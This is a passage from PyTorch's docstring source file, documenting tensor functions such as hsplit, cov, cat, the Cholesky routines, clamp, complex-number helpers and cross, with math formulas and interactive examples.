This function is safe to use as long as only the input, or only the outputs
are modified inplace after calling this function. It is user's
responsibility to ensure that is the case. If both the input and one or more
of the outputs are modified inplace, gradients computed by autograd will be
silently incorrect.
""")
add_docstr(torch.unsafe_split,
r"""
unsafe_split(tensor, split_size_or_sections, dim=0) -> List of Tensors
Works like :func:`torch.split` but without enforcing the autograd restrictions
on inplace modification of the outputs.
.. warning::
This function is safe to use as long as only the input, or only the outputs
are modified inplace after calling this function. It is user's
responsibility to ensure that is the case. If both the input and one or more
of the outputs are modified inplace, gradients computed by autograd will be
silently incorrect.
""")
add_docstr(torch.hsplit,
r"""
hsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with one or more dimensions, into multiple tensors
horizontally according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
If :attr:`input` is one dimensional this is equivalent to calling
torch.tensor_split(input, indices_or_sections, dim=0) (the split dimension is
zero), and if :attr:`input` has two or more dimensions it's equivalent to calling
torch.tensor_split(input, indices_or_sections, dim=1) (the split dimension is 1),
except that if :attr:`indices_or_sections` is an integer it must evenly divide
the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.hsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(4,4)
>>> t
tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> torch.hsplit(t, 2)
(tensor([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[12., 13.]]),
tensor([[ 2., 3.],
[ 6., 7.],
[10., 11.],
[14., 15.]]))
>>> torch.hsplit(t, [3, 6])
(tensor([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[12., 13., 14.]]),
tensor([[ 3.],
[ 7.],
[11.],
[15.]]),
tensor([], size=(4, 0)))
""")
add_docstr(torch.vsplit,
r"""
vsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with two or more dimensions, into multiple tensors
vertically according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
This is equivalent to calling torch.tensor_split(input, indices_or_sections, dim=0)
(the split dimension is 0), except that if :attr:`indices_or_sections` is an integer
it must evenly divide the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.vsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(4,4)
>>> t
tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> torch.vsplit(t, 2)
(tensor([[0., 1., 2., 3.],
[4., 5., 6., 7.]]),
tensor([[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]))
>>> torch.vsplit(t, [3, 6])
(tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.]]),
tensor([[12., 13., 14., 15.]]),
tensor([], size=(0, 4)))
""")
add_docstr(torch.dsplit,
r"""
dsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with three or more dimensions, into multiple tensors
depthwise according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
This is equivalent to calling torch.tensor_split(input, indices_or_sections, dim=2)
(the split dimension is 2), except that if :attr:`indices_or_sections` is an integer
it must evenly divide the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.dsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(2, 2, 4)
>>> t
tensor([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]])
>>> torch.dsplit(t, 2)
(tensor([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[12., 13.]]]),
tensor([[[ 2., 3.],
[ 6., 7.]],
[[10., 11.],
[14., 15.]]]))
>>> torch.dsplit(t, [3, 6])
(tensor([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[12., 13., 14.]]]),
tensor([[[ 3.],
[ 7.]],
[[11.],
[15.]]]),
tensor([], size=(2, 2, 0)))
""")
add_docstr(torch.can_cast,
r"""
can_cast(from, to) -> bool
Determines if a type conversion is allowed under PyTorch casting rules
described in the type promotion :ref:`documentation <type-promotion-doc>`.
Args:
from (dtype): The original :class:`torch.dtype`.
to (dtype): The target :class:`torch.dtype`.
Example::
>>> torch.can_cast(torch.double, torch.float)
True
>>> torch.can_cast(torch.float, torch.int)
False
""")
add_docstr(torch.corrcoef, r"""
corrcoef(input) -> Tensor
Estimates the Pearson product-moment correlation coefficient matrix of the variables given by the :attr:`input` matrix,
where rows are the variables and columns are the observations.
.. note::
The correlation coefficient matrix R is computed using the covariance matrix C as given by
:math:`R_{ij} = \frac{ C_{ij} } { \sqrt{ C_{ii} * C_{jj} } }`
.. note::
Due to floating point rounding, the resulting array may not be Hermitian and its diagonal elements may not be 1.
The real and imaginary values are clipped to the interval [-1, 1] in an attempt to improve this situation.
Args:
input (Tensor): A 2D matrix containing multiple variables and observations, or a
Scalar or 1D vector representing a single variable.
Returns:
(Tensor) The correlation coefficient matrix of the variables.
.. seealso::
:func:`torch.cov` covariance matrix.
Example::
>>> x = torch.tensor([[0, 1, 2], [2, 1, 0]])
>>> torch.corrcoef(x)
tensor([[ 1., -1.],
[-1., 1.]])
>>> x = torch.randn(2, 4)
>>> x
tensor([[-0.2678, -0.0908, -0.3766, 0.2780],
[-0.5812, 0.1535, 0.2387, 0.2350]])
>>> torch.corrcoef(x)
tensor([[1.0000, 0.3582],
[0.3582, 1.0000]])
>>> torch.corrcoef(x[0])
tensor(1.)
""")
add_docstr(torch.cov, r"""
cov(input, *, correction=1, fweights=None, aweights=None) -> Tensor
Estimates the covariance matrix of the variables given by the :attr:`input` matrix, where rows are
the variables and columns are the observations.
A covariance matrix is a square matrix giving the covariance of each pair of variables. The diagonal contains
the variance of each variable (covariance of a variable with itself). By definition, if :attr:`input` represents
a single variable (Scalar or 1D) then its variance is returned.
The unbiased sample covariance of the variables :math:`x` and :math:`y` is given by:
.. math::
\text{cov}_w(x,y) = \frac{\sum^{N}_{i = 1}(x_{i} - \bar{x})(y_{i} - \bar{y})}{N~-~1}
where :math:`\bar{x}` and :math:`\bar{y}` are the simple means of the :math:`x` and :math:`y` respectively.
If :attr:`fweights` and/or :attr:`aweights` are provided, the unbiased weighted covariance
is calculated, which is given by:
.. math::
\text{cov}_w(x,y) = \frac{\sum^{N}_{i = 1}w_i(x_{i} - \mu_x^*)(y_{i} - \mu_y^*)}{\sum^{N}_{i = 1}w_i~-~1}
where :math:`w` denotes :attr:`fweights` or :attr:`aweights` based on whichever is provided, or
:math:`w = fweights \times aweights` if both are provided, and
:math:`\mu_x^* = \frac{\sum^{N}_{i = 1}w_ix_{i} }{\sum^{N}_{i = 1}w_i}` is the weighted mean of the variable.
Args:
input (Tensor): A 2D matrix containing multiple variables and observations, or a
Scalar or 1D vector representing a single variable.
Keyword Args:
correction (int, optional): difference between the sample size and sample degrees of freedom.
Defaults to Bessel's correction, ``correction = 1`` which returns the unbiased estimate,
even if both :attr:`fweights` and :attr:`aweights` are specified. ``correction = 0``
will return the simple average. Defaults to ``1``.
fweights (tensor, optional): A Scalar or 1D tensor of observation vector frequencies representing the number of
times each observation should be repeated. Its numel must equal the number of columns of :attr:`input`.
Must have integral dtype. Ignored if ``None``. `Defaults to ``None``.
aweights (tensor, optional): A Scalar or 1D array of observation vector weights.
These relative weights are typically large for observations considered “important” and smaller for
observations considered less “important”. Its numel must equal the number of columns of :attr:`input`.
Must have floating point dtype. Ignored if ``None``. `Defaults to ``None``.
Returns:
(Tensor) The covariance matrix of the variables.
.. seealso::
:func:`torch.corrcoef` normalized covariance matrix.
Example::
>>> x = torch.tensor([[0, 2], [1, 1], [2, 0]]).T
>>> x
tensor([[0, 1, 2],
[2, 1, 0]])
>>> torch.cov(x)
tensor([[ 1., -1.],
[-1., 1.]])
>>> torch.cov(x, correction=0)
tensor([[ 0.6667, -0.6667],
[-0.6667, 0.6667]])
>>> fw = torch.randint(1, 10, (3,))
>>> fw
tensor([1, 6, 9])
>>> aw = torch.rand(3)
>>> aw
tensor([0.4282, 0.0255, 0.4144])
>>> torch.cov(x, fweights=fw, aweights=aw)
tensor([[ 0.4169, -0.4169],
[-0.4169, 0.4169]])
""")
add_docstr(torch.cat,
r"""
cat(tensors, dim=0, *, out=None) -> Tensor
Concatenates the given sequence of :attr:`seq` tensors in the given dimension.
All tensors must either have the same shape (except in the concatenating
dimension) or be empty.
:func:`torch.cat` can be seen as an inverse operation for :func:`torch.split`
and :func:`torch.chunk`.
:func:`torch.cat` can be best understood via examples.
Args:
tensors (sequence of Tensors): any python sequence of tensors of the same type.
Non-empty tensors provided must have the same shape, except in the
cat dimension.
dim (int, optional): the dimension over which the tensors are concatenated
Keyword args:
{out}
Example::
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497]])
>>> torch.cat((x, x, x), 0)
tensor([[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497],
[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497],
[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497]])
>>> torch.cat((x, x, x), 1)
tensor([[ 0.6580, -1.0969, -0.4614, 0.6580, -1.0969, -0.4614, 0.6580,
-1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497, -0.1034, -0.5790, 0.1497, -0.1034,
-0.5790, 0.1497]])
""".format(**common_args))
add_docstr(torch.concat,
r"""
concat(tensors, dim=0, *, out=None) -> Tensor
Alias of :func:`torch.cat`.
""")
add_docstr(torch.ceil,
r"""
ceil(input, *, out=None) -> Tensor
Returns a new tensor with the ceil of the elements of :attr:`input`,
the smallest integer greater than or equal to each element.
.. math::
\text{out}_{i} = \left\lceil \text{input}_{i} \right\rceil
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.6341, -1.4208, -1.0900, 0.5826])
>>> torch.ceil(a)
tensor([-0., -1., -1., 1.])
""".format(**common_args))
add_docstr(torch.real,
r"""
real(input) -> Tensor
Returns a new tensor containing real values of the :attr:`self` tensor.
The returned tensor and :attr:`self` share the same underlying storage.
.. warning::
:func:`real` is only supported for tensors with complex dtypes.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.3100+0.3553j), (-0.5445-0.7896j), (-1.6492-0.0633j), (-0.0638-0.8119j)])
>>> x.real
tensor([ 0.3100, -0.5445, -1.6492, -0.0638])
""".format(**common_args))
add_docstr(torch.imag,
r"""
imag(input) -> Tensor
Returns a new tensor containing imaginary values of the :attr:`self` tensor.
The returned tensor and :attr:`self` share the same underlying storage.
.. warning::
:func:`imag` is only supported for tensors with complex dtypes.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.3100+0.3553j), (-0.5445-0.7896j), (-1.6492-0.0633j), (-0.0638-0.8119j)])
>>> x.imag
tensor([ 0.3553, -0.7896, -0.0633, -0.8119])
""".format(**common_args))
add_docstr(torch.view_as_real,
r"""
view_as_real(input) -> Tensor
Returns a view of :attr:`input` as a real tensor. For an input complex tensor of
:attr:`size` :math:`m1, m2, \dots, mi`, this function returns a new
real tensor of size :math:`m1, m2, \dots, mi, 2`, where the last dimension of size 2
represents the real and imaginary components of complex numbers.
.. warning::
:func:`view_as_real` is only supported for tensors with ``complex dtypes``.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.4737-0.3839j), (-0.2098-0.6699j), (0.3470-0.9451j), (-0.5174-1.3136j)])
>>> torch.view_as_real(x)
tensor([[ 0.4737, -0.3839],
[-0.2098, -0.6699],
[ 0.3470, -0.9451],
[-0.5174, -1.3136]])
""".format(**common_args))
add_docstr(torch.view_as_complex,
r"""
view_as_complex(input) -> Tensor
Returns a view of :attr:`input` as a complex tensor. For an input complex
tensor of :attr:`size` :math:`m1, m2, \dots, mi, 2`, this function returns a
new complex tensor of :attr:`size` :math:`m1, m2, \dots, mi` where the last
dimension of the input tensor is expected to represent the real and imaginary
components of complex numbers.
.. warning::
:func:`view_as_complex` is only supported for tensors with
:class:`torch.dtype` ``torch.float64`` and ``torch.float32``. The input is
expected to have the last dimension of :attr:`size` 2. In addition, the
tensor must have a `stride` of 1 for its last dimension. The strides of all
other dimensions must be even numbers.
Args:
{input}
Example::
>>> x=torch.randn(4, 2)
>>> x
tensor([[ 1.6116, -0.5772],
[-1.4606, -0.9120],
[ 0.0786, -1.7497],
[-0.6561, -1.6623]])
>>> torch.view_as_complex(x)
tensor([(1.6116-0.5772j), (-1.4606-0.9120j), (0.0786-1.7497j), (-0.6561-1.6623j)])
""".format(**common_args))
add_docstr(torch.reciprocal,
r"""
reciprocal(input, *, out=None) -> Tensor
Returns a new tensor with the reciprocal of the elements of :attr:`input`
.. math::
\text{out}_{i} = \frac{1}{\text{input}_{i}}
.. note::
Unlike NumPy's reciprocal, torch.reciprocal supports integral inputs. Integral
inputs to reciprocal are automatically :ref:`promoted <type-promotion-doc>` to
the default scalar type.
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.4595, -2.1219, -1.4314, 0.7298])
>>> torch.reciprocal(a)
tensor([-2.1763, -0.4713, -0.6986, 1.3702])
""".format(**common_args))
add_docstr(torch.cholesky, r"""
cholesky(input, upper=False, *, out=None) -> Tensor
Computes the Cholesky decomposition of a symmetric positive-definite
matrix :math:`A` or for batches of symmetric positive-definite matrices.
If :attr:`upper` is ``True``, the returned matrix ``U`` is upper-triangular, and
the decomposition has the form:
.. math::
A = U^TU
If :attr:`upper` is ``False``, the returned matrix ``L`` is lower-triangular, and
the decomposition has the form:
.. math::
A = LL^T
If :attr:`upper` is ``True``, and :math:`A` is a batch of symmetric positive-definite
matrices, then the returned tensor will be composed of upper-triangular Cholesky factors
of each of the individual matrices. Similarly, when :attr:`upper` is ``False``, the returned
tensor will be composed of lower-triangular Cholesky factors of each of the individual
matrices.
.. warning::
:func:`torch.cholesky` is deprecated in favor of :func:`torch.linalg.cholesky`
and will be removed in a future PyTorch release.
``L = torch.cholesky(A)`` should be replaced with
.. code:: python
L = torch.linalg.cholesky(A)
``U = torch.cholesky(A, upper=True)`` should be replaced with
.. code:: python
U = torch.linalg.cholesky(A).mH
This transform will produce equivalent results for all valid (symmetric positive definite) inputs.
Args:
input (Tensor): the input tensor :math:`A` of size :math:`(*, n, n)` where `*` is zero or more
batch dimensions consisting of symmetric positive-definite matrices.
upper (bool, optional): flag that indicates whether to return a
upper or lower triangular matrix. Default: ``False``
Keyword args:
out (Tensor, optional): the output matrix
Example::
>>> a = torch.randn(3, 3)
>>> a = a @ a.mT + 1e-3 # make symmetric positive-definite
>>> l = torch.cholesky(a)
>>> a
tensor([[ 2.4112, -0.7486, 1.4551],
[-0.7486, 1.3544, 0.1294],
[ 1.4551, 0.1294, 1.6724]])
>>> l
tensor([[ 1.5528, 0.0000, 0.0000],
[-0.4821, 1.0592, 0.0000],
[ 0.9371, 0.5487, 0.7023]])
>>> l @ l.mT
tensor([[ 2.4112, -0.7486, 1.4551],
[-0.7486, 1.3544, 0.1294],
[ 1.4551, 0.1294, 1.6724]])
>>> a = torch.randn(3, 2, 2) # Example for batched input
>>> a = a @ a.mT + 1e-03 # make symmetric positive-definite
>>> l = torch.cholesky(a)
>>> z = l @ l.mT
>>> torch.dist(z, a)
tensor(2.3842e-07)
""")
add_docstr(torch.cholesky_solve, r"""
cholesky_solve(input, input2, upper=False, *, out=None) -> Tensor
Solves a linear system of equations with a positive semidefinite
matrix to be inverted given its Cholesky factor matrix :math:`u`.
If :attr:`upper` is ``False``, :math:`u` is and lower triangular and `c` is
returned such that:
.. math::
c = (u u^T)^{{-1}} b
If :attr:`upper` is ``True`` or not provided, :math:`u` is upper triangular
and `c` is returned such that:
.. math::
c = (u^T u)^{{-1}} b
`torch.cholesky_solve(b, u)` can take in 2D inputs `b, u` or inputs that are
batches of 2D matrices. If the inputs are batches, then returns
batched outputs `c`
Supports real-valued and complex-valued inputs.
For the complex-valued inputs the transpose operator above is the conjugate transpose.
Args:
input (Tensor): input matrix :math:`b` of size :math:`(*, m, k)`,
where :math:`*` is zero or more batch dimensions
input2 (Tensor): input matrix :math:`u` of size :math:`(*, m, m)`,
where :math:`*` is zero of more batch dimensions composed of
upper or lower triangular Cholesky factor
upper (bool, optional): whether to consider the Cholesky factor as a
lower or upper triangular matrix. Default: ``False``.
Keyword args:
out (Tensor, optional): the output tensor for `c`
Example::
>>> a = torch.randn(3, 3)
>>> a = torch.mm(a, a.t()) # make symmetric positive definite
>>> u = torch.linalg.cholesky(a)
>>> a
tensor([[ 0.7747, -1.9549, 1.3086],
[-1.9549, 6.7546, -5.4114],
[ 1.3086, -5.4114, 4.8733]])
>>> b = torch.randn(3, 2)
>>> b
tensor([[-0.6355, 0.9891],
[ 0.1974, 1.4706],
[-0.4115, -0.6225]])
>>> torch.cholesky_solve(b, u)
tensor([[ -8.1625, 19.6097],
[ -5.8398, 14.2387],
[ -4.3771, 10.4173]])
>>> torch.mm(a.inverse(), b)
tensor([[ -8.1626, 19.6097],
[ -5.8398, 14.2387],
[ -4.3771, 10.4173]])
""")
add_docstr(torch.cholesky_inverse, r"""
cholesky_inverse(input, upper=False, *, out=None) -> Tensor
Computes the inverse of a symmetric positive-definite matrix :math:`A` using its
Cholesky factor :math:`u`: returns matrix ``inv``. The inverse is computed using
LAPACK routines ``dpotri`` and ``spotri`` (and the corresponding MAGMA routines).
If :attr:`upper` is ``False``, :math:`u` is lower triangular
such that the returned tensor is
.. math::
inv = (uu^{{T}})^{{-1}}
If :attr:`upper` is ``True`` or not provided, :math:`u` is upper
triangular such that the returned tensor is
.. math::
inv = (u^T u)^{{-1}}
Supports input of float, double, cfloat and cdouble dtypes.
Also supports batches of matrices, and if :math:`A` is a batch of matrices then the output has the same batch dimensions.
Args:
input (Tensor): the input tensor :math:`A` of size :math:`(*, n, n)`,
consisting of symmetric positive-definite matrices
where :math:`*` is zero or more batch dimensions.
upper (bool, optional): flag that indicates whether to return a
upper or lower triangular matrix. Default: False
Keyword args:
out (Tensor, optional): the output tensor for `inv`
Example::
>>> a = torch.randn(3, 3)
>>> a = torch.mm(a, a.t()) + 1e-05 * torch.eye(3) # make symmetric positive definite
>>> u = torch.linalg.cholesky(a)
>>> a
tensor([[ 0.9935, -0.6353, 1.5806],
[ -0.6353, 0.8769, -1.7183],
[ 1.5806, -1.7183, 10.6618]])
>>> torch.cholesky_inverse(u)
tensor([[ 1.9314, 1.2251, -0.0889],
[ 1.2251, 2.4439, 0.2122],
[-0.0889, 0.2122, 0.1412]])
>>> a.inverse()
tensor([[ 1.9314, 1.2251, -0.0889],
[ 1.2251, 2.4439, 0.2122],
[-0.0889, 0.2122, 0.1412]])
>>> a = torch.randn(3, 2, 2) # Example for batched input
>>> a = a @ a.mT + 1e-03 # make symmetric positive-definite
>>> l = torch.linalg.cholesky(a)
>>> z = l @ l.mT
>>> torch.dist(z, a)
tensor(3.5894e-07)
""")
add_docstr(torch.clone, r"""
clone(input, *, memory_format=torch.preserve_format) -> Tensor
Returns a copy of :attr:`input`.
.. note::
This function is differentiable, so gradients will flow back from the
result of this operation to :attr:`input`. To create a tensor without an
autograd relationship to :attr:`input` see :meth:`~Tensor.detach`.
Args:
{input}
Keyword args:
{memory_format}
""".format(**common_args))
add_docstr(torch.clamp, r"""
clamp(input, min=None, max=None, *, out=None) -> Tensor
Clamps all elements in :attr:`input` into the range `[` :attr:`min`, :attr:`max` `]`.
Letting min_value and max_value be :attr:`min` and :attr:`max`, respectively, this returns:
.. math::
y_i = \min(\max(x_i, \text{min\_value}_i), \text{max\_value}_i)
If :attr:`min` is ``None``, there is no lower bound.
Or, if :attr:`max` is ``None`` there is no upper bound.
""" + r"""
.. note::
If :attr:`min` is greater than :attr:`max` :func:`torch.clamp(..., min, max) <torch.clamp>`
sets all elements in :attr:`input` to the value of :attr:`max`.
Args:
{input}
min (Number or Tensor, optional): lower-bound of the range to be clamped to
max (Number or Tensor, optional): upper-bound of the range to be clamped to
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-1.7120, 0.1734, -0.0478, -0.0922])
>>> torch.clamp(a, min=-0.5, max=0.5)
tensor([-0.5000, 0.1734, -0.0478, -0.0922])
>>> min = torch.linspace(-1, 1, steps=4)
>>> torch.clamp(a, min=min)
tensor([-1.0000, 0.1734, 0.3333, 1.0000])
""".format(**common_args))
add_docstr(torch.clip, r"""
clip(input, min=None, max=None, *, out=None) -> Tensor
Alias for :func:`torch.clamp`.
""")
add_docstr(torch.column_stack,
r"""
column_stack(tensors, *, out=None) -> Tensor
Creates a new tensor by horizontally stacking the tensors in :attr:`tensors`.
Equivalent to ``torch.hstack(tensors)``, except each zero or one dimensional tensor ``t``
in :attr:`tensors` is first reshaped into a ``(t.numel(), 1)`` column before being stacked horizontally.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.column_stack((a, b))
tensor([[1, 4],
[2, 5],
[3, 6]])
>>> a = torch.arange(5)
>>> b = torch.arange(10).reshape(5, 2)
>>> torch.column_stack((a, b, b))
tensor([[0, 0, 1, 0, 1],
[1, 2, 3, 2, 3],
[2, 4, 5, 4, 5],
[3, 6, 7, 6, 7],
[4, 8, 9, 8, 9]])
""".format(**common_args))
add_docstr(torch.complex,
r"""
complex(real, imag, *, out=None) -> Tensor
Constructs a complex tensor with its real part equal to :attr:`real` and its
imaginary part equal to :attr:`imag`.
Args:
real (Tensor): The real part of the complex tensor. Must be float or double.
imag (Tensor): The imaginary part of the complex tensor. Must be same dtype
as :attr:`real`.
Keyword args:
out (Tensor): If the inputs are ``torch.float32``, must be
``torch.complex64``. If the inputs are ``torch.float64``, must be
``torch.complex128``.
Example::
>>> real = torch.tensor([1, 2], dtype=torch.float32)
>>> imag = torch.tensor([3, 4], dtype=torch.float32)
>>> z = torch.complex(real, imag)
>>> z
tensor([(1.+3.j), (2.+4.j)])
>>> z.dtype
torch.complex64
""")
add_docstr(torch.polar,
r"""
polar(abs, angle, *, out=None) -> Tensor
Constructs a complex tensor whose elements are Cartesian coordinates
corresponding to the polar coordinates with absolute value :attr:`abs` and angle
:attr:`angle`.
.. math::
\text{out} = \text{abs} \cdot \cos(\text{angle}) + \text{abs} \cdot \sin(\text{angle}) \cdot j
.. note::
`torch.polar` is similar to
`std::polar <https://en.cppreference.com/w/cpp/numeric/complex/polar>`_
and does not compute the polar decomposition
of a complex tensor like Python's `cmath.polar` and SciPy's `linalg.polar` do.
The behavior of this function is undefined if `abs` is negative or NaN, or if `angle` is
infinite.
""" + r"""
Args:
abs (Tensor): The absolute value the complex tensor. Must be float or double.
angle (Tensor): The angle of the complex tensor. Must be same dtype as
:attr:`abs`.
Keyword args:
out (Tensor): If the inputs are ``torch.float32``, must be
``torch.complex64``. If the inputs are ``torch.float64``, must be
``torch.complex128``.
Example::
>>> import numpy as np
>>> abs = torch.tensor([1, 2], dtype=torch.float64)
>>> angle = torch.tensor([np.pi / 2, 5 * np.pi / 4], dtype=torch.float64)
>>> z = torch.polar(abs, angle)
>>> z
tensor([(0.0000+1.0000j), (-1.4142-1.4142j)], dtype=torch.complex128)
""")
add_docstr(torch.conj_physical,
r"""
conj_physical(input, *, out=None) -> Tensor
Computes the element-wise conjugate of the given :attr:`input` tensor.
If :attr:`input` has a non-complex dtype, this function just returns :attr:`input`.
.. note::
This performs the conjugate operation regardless of the fact conjugate bit is set or not.
.. warning:: In the future, :func:`torch.conj_physical` may return a non-writeable view for an :attr:`input` of
non-complex dtype. It's recommended that programs not modify the tensor returned by :func:`torch.conj_physical`
when :attr:`input` is of non-complex dtype to be compatible with this change.
.. math::
\text{out}_{i} = conj(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.conj_physical(torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j]))
tensor([-1 - 1j, -2 - 2j, 3 + 3j])
""".format(**common_args))
add_docstr(torch.conj,
r"""
conj(input) -> Tensor
Returns a view of :attr:`input` with a flipped conjugate bit. If :attr:`input` has a non-complex dtype,
this function just returns :attr:`input`.
.. note::
:func:`torch.conj` performs a lazy conjugation, but the actual conjugated tensor can be materialized
at any time using :func:`torch.resolve_conj`.
.. warning:: In the future, :func:`torch.conj` may return a non-writeable view for an :attr:`input` of
non-complex dtype. It's recommended that programs not modify the tensor returned by :func:`torch.conj_physical`
when :attr:`input` is of non-complex dtype to be compatible with this change.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> x.is_conj()
False
>>> y = torch.conj(x)
>>> y.is_conj()
True
""".format(**common_args))
add_docstr(torch.resolve_conj,
r"""
resolve_conj(input) -> Tensor
Returns a new tensor with materialized conjugation if :attr:`input`'s conjugate bit is set to `True`,
else returns :attr:`input`. The output tensor will always have its conjugate bit set to `False`.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> y = x.conj()
>>> y.is_conj()
True
>>> z = y.resolve_conj()
>>> z
tensor([-1 - 1j, -2 - 2j, 3 + 3j])
>>> z.is_conj()
False
""".format(**common_args))
add_docstr(torch.resolve_neg,
r"""
resolve_neg(input) -> Tensor
Returns a new tensor with materialized negation if :attr:`input`'s negative bit is set to `True`,
else returns :attr:`input`. The output tensor will always have its negative bit set to `False`.
Args:
{input}
Example::
>>> x = torch.tensor([-1 + 1j, -2 + 2j, 3 - 3j])
>>> y = x.conj()
>>> z = y.imag
>>> z.is_neg()
True
>>> out = y.resolve_neg()
>>> out
tensor([-1, -2, -3])
>>> out.is_neg()
False
""".format(**common_args))
add_docstr(torch.copysign,
r"""
copysign(input, other, *, out=None) -> Tensor
Create a new floating-point tensor with the magnitude of :attr:`input` and the sign of :attr:`other`, elementwise.
.. math::
\text{out}_{i} = \begin{cases}
-|\text{input}_{i}| & \text{if} \text{other}_{i} \leq -0.0 \\
|\text{input}_{i}| & \text{if} \text{other}_{i} \geq 0.0 \\
\end{cases}
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
and integer and float inputs.
Args:
input (Tensor): magnitudes.
other (Tensor or Number): contains value(s) whose signbit(s) are
applied to the magnitudes in :attr:`input`.
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-1.2557, -0.0026, -0.5387, 0.4740, -0.9244])
>>> torch.copysign(a, 1)
tensor([1.2557, 0.0026, 0.5387, 0.4740, 0.9244])
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.7079, 0.2778, -1.0249, 0.5719],
[-0.0059, -0.2600, -0.4475, -1.3948],
[ 0.3667, -0.9567, -2.5757, -0.1751],
[ 0.2046, -0.0742, 0.2998, -0.1054]])
>>> b = torch.randn(4)
tensor([ 0.2373, 0.3120, 0.3190, -1.1128])
>>> torch.copysign(a, b)
tensor([[ 0.7079, 0.2778, 1.0249, -0.5719],
[ 0.0059, 0.2600, 0.4475, -1.3948],
[ 0.3667, 0.9567, 2.5757, -0.1751],
[ 0.2046, 0.0742, 0.2998, -0.1054]])
""".format(**common_args))
add_docstr(torch.cos,
r"""
cos(input, *, out=None) -> Tensor
Returns a new tensor with the cosine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \cos(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 1.4309, 1.2706, -0.8562, 0.9796])
>>> torch.cos(a)
tensor([ 0.1395, 0.2957, 0.6553, 0.5574])
""".format(**common_args))
add_docstr(torch.cosh,
r"""
cosh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic cosine of the elements of
:attr:`input`.
.. math::
\text{out}_{i} = \cosh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.1632, 1.1835, -0.6979, -0.7325])
>>> torch.cosh(a)
tensor([ 1.0133, 1.7860, 1.2536, 1.2805])
.. note::
When :attr:`input` is on the CPU, the implementation of torch.cosh may use
the Sleef library, which rounds very large results to infinity or negative
infinity. See `here <https://sleef.org/purec.xhtml>`_ for details.
""".format(**common_args))
add_docstr(torch.cross,
r"""
cross(input, other, dim=None, *, out=None) -> Tensor
Returns the cross product of vectors in dimension :attr:`dim` of :attr:`input`
and :attr:`other`.
Supports input of float, double, cfloat and cdouble dtypes. Also supports batches
of vectors, for which it computes the product along the dimension :attr:`dim`.
In this case, the output has the same batch dimensions as the inputs.
If :attr:`dim` is not given, it defaults to the first dimension found with the
size 3. Note that this might be unexpected.
.. seealso::
:func:`torch.linalg.cross` which requires specifying dim (defaulting to -1).
.. warning:: This function may change in a future PyTorch release to match
the default behaviour in :func:`torch.linalg.cross`. We recommend using
:func:`torch.linalg.cross`.
Args:
{input}
other (Tensor): the second input tensor
dim (int, optional): the dimension to take the cross-product in.
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 3)
>>> a
tensor([[-0.3956, 1.1455, 1.6895],
[-0.5849, 1.3672, 0.3599],
